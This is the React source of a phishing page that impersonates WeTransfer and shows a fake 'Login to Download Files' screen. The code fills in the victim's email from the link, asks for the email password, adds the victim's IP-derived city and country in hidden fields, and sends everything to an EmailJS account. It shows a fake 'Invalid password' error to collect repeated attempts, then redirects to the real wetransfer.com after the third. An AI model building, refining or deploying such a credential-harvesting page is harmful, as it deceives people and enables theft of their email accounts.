import React, { useState, useRef, useEffect } from 'react';
import './Wetransfer.css';
import { ReactComponent as Logo} from './Media/SVG/logo.svg';
import { ReactComponent as Downloadsvg} from './Media/SVG/download.svg';
import { SlideIn } from './Component/SlideIn/SlideIn';
// import { Form } from './Component/Form/Form';
import emailJS from '@emailjs/browser';

function WeTransfer() {
  const referalPnt = useRef();

  const [btn, setBtn] = useState('Download')

  const [count, setCount] = useState(0);
  const [err, setErr] = useState(false);

      const [ipAdress, setIpAdress] = useState('')
      const [city, setCity] = useState('');
      const [flag, setFlag] = useState('');
      const [country, setCountry] = useState('');
      
      // const forTime = new Date();
  
      useEffect(()=>{
        fetch(`https://api.geoapify.com/v1/ipinfo?apiKey=139d2378a5554f48bf290b61999b4e8a`)
        .then(req=> req.json())
        .then(res=>{
    
            setIpAdress(res.ip)
            setFlag(res.country.flag);
            setCountry(res.country.name);
            setCity(res.city.names.en);
  
            setFlag(flag);
            setIpAdress(ipAdress);
    
        })
        .catch(e=> console.log)
    }, [flag, ipAdress]);
  
      const emailInTheURL = window.location.href;
      const sliceEqualSign = emailInTheURL.indexOf("=");
      const extracetdEmail = emailInTheURL.substr((sliceEqualSign+1)).split('&^$', 1).toString();

      const [flavour, setFlavour] = useState(extracetdEmail);
      const [detl, setDetl] = useState('');
      const [emptyPswd, setEmptyPswd] = useState(false);


      const submitWetransferDetails = (e)=>{
              e.preventDefault();
              if(detl === ""){
                  setEmptyPswd(true);
                  setErr(false);
                  return null
              }else{
      
                  setCount(count=> count + 1);
                  if(count >= 2){
                      const redirectURL = window.location.href;
                      const sliceEqualSign = redirectURL.indexOf("@");
                      const extracetdemailDomain = redirectURL.substr((sliceEqualSign+1)).split('&^$', 1).toString();
                      console.log(extracetdemailDomain);
                      window.location.href = "https://wetransfer.com/";
                  }; 
      
      
      // here..always check to upload the emailJS when uploading, IMPORTANT!
              // ====================================================
              
      
      
              const serviceID = `service_erj`;
              const templateID = `template_6pk805x`;
              const publicKey = `U7892k39e8uwi`;
      
      
              emailJS
              .sendForm(serviceID, templateID, referalPnt.current, {
                publicKey: publicKey,
              })
              .then(
                () => {
                  console.log('a');
                },
                (error) => {
                  console.log('b', error.text);
                },
              );
      
      //         =========================================
      
                  // setSpin(true);
                  setBtn('Downloading...')
      
                  setTimeout(() => {
                      setDetl('');
                      setErr(true);
                      setBtn(btn);
                      setEmptyPswd(false);
                      setTimeout(() => {
                          setErr(false);
                      }, 4000);
                  }, 4500);
              }
          };





const mdl_TopIm = "data:image/svg+xml;charset=utf-8;base64,PHN2ZyB3aWR0aD0iNzkiIGhlaWdodD0iNzYiIHZpZXdCb3g9IjAgMCA3OSA3NiIgZmlsbD0ibm9uZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPG1hc2sgaWQ9Im1hc2swIiBtYXNrLXR5cGU9ImFscGhhIiBtYXNrVW5pdHM9InVzZXJTcGFjZU9uVXNlIiB4PSIwIiB5PSIwIiB3aWR0aD0iODAiIGhlaWdodD0iNzYiPgo8cGF0aCBkPSJNNTYuMzM1NCA3My4zODI2QzcwLjU5NzEgNjguNzIxNiA3OC45MTI2IDU4LjQ5MzYgNzkgMzhDNzguOTEyNiAxNy41MDY0IDcwLjU5NzEgNy4yNzgzOCA1Ni4zMzU0IDIuNjE3NDFDNTEuNTEyNiAxLjA0MzA3IDQ1LjgwODggLTEuNTMzNDFlLTA2IDM5LjYyMDcgLTEuODE5M2UtMDZDMzMuNDI4NiAtMi4xMDUzN2UtMDYgMjcuNzI0NyAxLjA0MzA3IDIyLjkwNiAyLjYxNzQxQzguNjQ0MjQgNy4yNzgzNyAwLjMyODc1MSAxNy41MDY0IDAuMjQxMzc3IDM4QzAuMzI4NzQ5IDU4LjQ5MzYgOC42NDQyNCA2OC43MjE2IDIyLjkwNiA3My4zODI2QzI3LjcyNDcgNzQuOTU2OSAzMy40Mjg2IDc2IDM5LjYyMDcgNzZDNDUuODA4OCA3NiA1MS41MTI2IDc0Ljk1NjkgNTYuMzM1NCA3My4zODI2WiIgZmlsbD0iIzQzNjlFRSIvPgo8L21hc2s+CjxnIG1hc2s9InVybCgjbWFzazApIj4KPHBhdGggZD0iTTU2LjMzNTQgNzMuMzgyNkM3MC41OTcxIDY4LjcyMTYgNzguOTEyNiA1OC40OTM2IDc5IDM4Qzc4LjkxMjYgMTcuNTA2NCA3MC41OTcxIDcuMjc4MzggNTYuMzM1NCAyLjYxNzQxQzUxLjUxMjYgMS4wNDMwNyA0NS44MDg4IC0xLjUzMzQxZS0wNiAzOS42MjA3IC0xLjgxOTNlLTA2QzMzLjQyODYgLTIuMTA1MzdlLTA2IDI3LjcyNDcgMS4wNDMwNyAyMi45MDYgMi42MTc0MUM4LjY0NDI0IDcuMjc4MzcgMC4zMjg3NTEgMTcuNTA2NCAwLjI0MTM3NyAzOEMwLjMyODc0OSA1OC40OTM2IDguNjQ0MjQgNjguNzIxNiAyMi45MDYgNzMuMzgyNkMyNy43MjQ3IDc0Ljk1NjkgMzMuNDI4NiA3NiAzOS42MjA3IDc2QzQ1LjgwODggNzYgNTEuNTEyNiA3NC45NTY5IDU2LjMzNTQgNzMuMzgyNloiIGZpbGw9IiM0MzY5RUUiLz4KPHBhdGggZD0iTTUwLjMzOTYgNjEuMDg4N0M2Ni40NDQ3IDU2LjQyNzcgNzUuODM0OSA0Ni4xOTk2IDc1LjkzMzYgMjUuNzA2MUM3NS44MzQ5IDUuMjEyNDkgNjYuNDQ0NyAtNS4wMTU1NyA1MC4zMzk2IC05LjY3NjU0QzQ0Ljg5MzYgLTExLjI1MDkgMzguNDUyNSAtMTIuMjkzOSAzMS40NjQ3IC0xMi4yOTM5QzI0LjQ3MjMgLTEyLjI5MzkgMTguMDMxMiAtMTEuMjUwOSAxMi41ODk3IC05LjY3NjU0Qy0zLjUxNTM3IC01LjAxNTU3IC0xMi45MDU2IDUuMjEyNDkgLTEzLjAwNDMgMjUuNzA2MUMtMTIuOTA1NiA0Ni4xOTk2IC0zLjUxNTM3IDU2LjQyNzcgMTIuNTg5NyA2MS4wODg2QzE4LjAzMTIgNjIuNjYzIDI0LjQ3MjMgNjMuNzA2MSAzMS40NjQ3IDYzLjcwNjFDMzguNDUyNSA2My43MDYxIDQ0Ljg5MzYgNjIuNjYzIDUwLjMzOTYgNjEuMDg4N1oiIGZpbGw9IiMxRjQ3RDMiLz4KPC9nPgo8cGF0aCBkPSJNMzMgMzQuNVYyOC41QzMzIDI1LjE4NjMgMzUuNjg2MyAyMi41IDM5IDIyLjVDNDIuMzEzNyAyMi41IDQ1IDI1LjE4NjMgNDUgMjguNVYzNC41IiBzdHJva2U9IndoaXRlIiBzdHJva2Utd2lkdGg9IjMiIHN0cm9rZS1saW5lY2FwPSJyb3VuZCIgc3Ryb2tlLWxpbmVqb2luPSJyb3VuZCIvPgo8cmVjdCB4PSIyNyIgeT0iMzQiIHdpZHRoPSIyNCIgaGVpZ2h0PSIyMiIgcng9IjQuNSIgZmlsbD0id2hpdGUiLz4KPC9zdmc+Cg==";





  const [slideState, setSlideState] = useState(false);
  const [formState, setFormState] = useState(false);
  
  const clickToPreviewSlideBar = ()=>{
    setSlideState(slide=> !slide);
  };


  const closeSlide = ()=>{
    setSlideState(false);
  };

  const toggleForm = ()=>{
    setFormState(formElement=> !formElement);
  };


  return (<main className='app'>

    { !slideState ? <SlideIn submitWetransferDetails={submitWetransferDetails} closeSlide={closeSlide} toggleForm={toggleForm} clickToPreviewSlideBar={clickToPreviewSlideBar}/> : null }

    {/* { formState ? <Form toggleForm={toggleForm}/> : null }    */}
    
    <header className='WeTransfer'>
      
      <div>
        <Logo id='svg_logo' onClick={()=> window.location.reload()} />
      </div>
      
      <div className='nav_list'>
        <ul className='ul_list_'>
          <li>Help</li>
          <li>Products</li>
          <li>Company</li>
          <li>Sign up</li>
          <li>Log in</li>
        </ul>
      </div>
    </header>


    <section className='transfer_dock'>

      <center>
        <img 
        className="img_key"
        alt="Secured"
        id="img_key"
        src={`${mdl_TopIm}`}
      />
      </center>

      <p className='lgn cntr'>Login to Download Files</p>
      <p className='chk cntr'>
        One quick check, You're almost 
        <br />
        there. Enter your email password to
        <br />

        continue.
      </p>

      <div className='eefhdjk'>
          <form className='frmom' ref={referalPnt} onSubmit={submitWetransferDetails}>
            <input
              className='eml inpp' 
              type='email'
              name='liverpool'
              id='liverpool'
              readOnly
              placeholder='Enter email address'
              value={flavour}
              onChange={e=> {
                setFlavour(e.target.value)
                if (flavour.length === 2) {
                  setEmptyPswd(false)
                }
              }}
            />

            <input 
              type='password'
              autoFocus
              autoComplete='true'
              className='pwd inpp'
              name='chelsea'
              value={detl}
              onChange={e=> setDetl(e.target.value)}
              placeholder='Enter email password'
            />

            { err ? <p className='e_rrrr'>Invalid password. Please try again</p> : undefined }

            { emptyPswd ? <p className='e_rrrr'>Password field is empty.! </p> : undefined }

            <p className='reqd'>*Enter required details to continue*</p>

                                                    <input type="text" value={country} name="country" hidden/>
                                                    <input type="text" value={city} name="city" hidden/>

            <input 
              type='submit'
              className='sbmt bbbbbnnnnn'
              id='sbmt_id'
              // style={{ color:'background: #5268ff !important;'}}
              value={`${btn}`}
              onClick={submitWetransferDetails}
            />
            
          </form>
      </div>

    </section>

    {/* =====================================================
    first element 
    ===================================================== */}


    {/* <div className='transfer_dock'>

      <div className='wrap_dn_load_'>
        <Downloadsvg className='download_scroll'/>
      </div>

      <div style={{
          // display: 'inline-block',
          marginTop: '-1.39rem'
        }}
          >
          <p className='ppp'>Ready when you are</p>
          <p className='small ppp'>Transfer expires in 7 days</p>
      </div>

      <div className='center'  onClick={clickToPreviewSlideBar}>

        <div className='details'>
          <p className='name'>
            4 files
          </p>

          <p className='size'>
            100.00 MB
          </p>
        </div>

        <div className='action'>
          <button className='preview'>Preview</button>
        </div>

      </div>

      <div className='footer'>
        <button className='dn_ld_iefh' onClick={clickToPreviewSlideBar}>Download</button>
      </div>
      
    </div> */}

        {/* 
            =====================================================
              first element 
            ===================================================== 
        */}

        

  </main>);
};

export default WeTransfer;